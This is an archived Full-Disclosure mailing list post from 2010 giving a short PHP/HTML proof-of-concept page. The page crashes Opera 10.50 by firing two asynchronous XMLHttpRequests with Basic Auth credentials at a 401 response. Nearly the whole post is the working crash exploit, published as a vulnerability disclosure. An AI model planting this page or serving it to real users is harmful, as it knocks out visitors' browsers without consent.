[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Opera 10.50 Asynchronous XMLHttpRequest Basic Auth Crash
From: spam account <peorth_17@xxxxxxxxxxx>
Date: Thu, 4 Mar 2010 15:53:59 -0600

First found it in one of the version 9 opera's and reported it, still works in 
10.50.

<?php
if (isset($_GET['crash']))
{
    header('HTTP/1.0 401 Unauthorized');
    header('WWW-Authenticate: Basic realm="crash"');
    exit();
}
?>
<!DOCTYPE html>
<html>
    <head>
        <title>Crash Opera</title>
        <script>
            function doit() {
                a = new XMLHttpRequest()
                a.open("GET", "?crash", true, "crash", "crash");
                a.send(null);
            }
            function crash() {
                doit();
                doit();
            }
        </script>
    </head>
    <body>
        <input type="submit" onclick="crash()" value="Crash Opera">
    </body>
</html>                                           
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
http://clk.atdmt.com/GBL/go/201469226/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Orb v2.0.01.0049-V2.54.0018 DirectShow Filter Integer Division By Zero
Next by Date: [Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
Previous by thread: [Full-disclosure] Orb v2.0.01.0049-V2.54.0018 DirectShow Filter Integer Division By Zero
Next by thread: [Full-disclosure] FreeBSD and OpenBSD ftpd bug (not exploitable?)
Index(es):
- Date
- Thread